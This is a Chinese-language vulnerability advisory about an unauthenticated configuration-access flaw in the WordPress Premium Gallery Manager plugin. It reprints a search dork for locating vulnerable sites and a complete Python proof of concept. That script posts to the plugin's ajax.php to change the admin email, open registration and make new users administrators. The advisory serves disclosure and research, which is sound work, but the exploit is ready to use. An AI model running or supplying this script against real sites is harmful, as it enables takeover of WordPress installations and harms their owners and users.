WordPress Premium Gallery Manager插件'option

发布日期：2014-09-05
更新日期：2014-09-09

受影响系统：
WordPress Premium Gallery Manager
描述：
BUGTRAQ  ID: 69663

WordPress Premium Gallery Manager插件可根据需要创建图库。

WordPress Premium Gallery Manager插件在option_panel/ajax.php的实现上存在访问绕过漏洞，成功利用后可使攻击者绕过某些安全限制并执行未授权操作。

<*来源：Hannaichi
  *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
 #Author : Hannaichi [@dntkun]
 #Date : February 5th, 2014
 #Type : php, html, htm, asp, etc.
 #Category : Web Applications
 #Vulnerability : Unauthenticated Configuration Access
 #Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))

#Exploit : [PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php

#POC :
 Save File As Python (.py) =
 import httplib, urllib

#target site
 site = "victim" #<--- no or https://
 #path to ajax.php
 url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
 ChangeOption(site, url, "admin_email", "youremail@test.com")
 ChangeOption(site, url, "users_can_register", "1")
 ChangeOption(site, url, "default_role", "administrator")
 print "Now register a new user, they are an administrator by default!"

 #Place It Broo No Lazy For This :D !!

--------------------------------------------------------------------------------------------------------------------

Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*

建议：
厂商补丁：

WordPress
 ---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：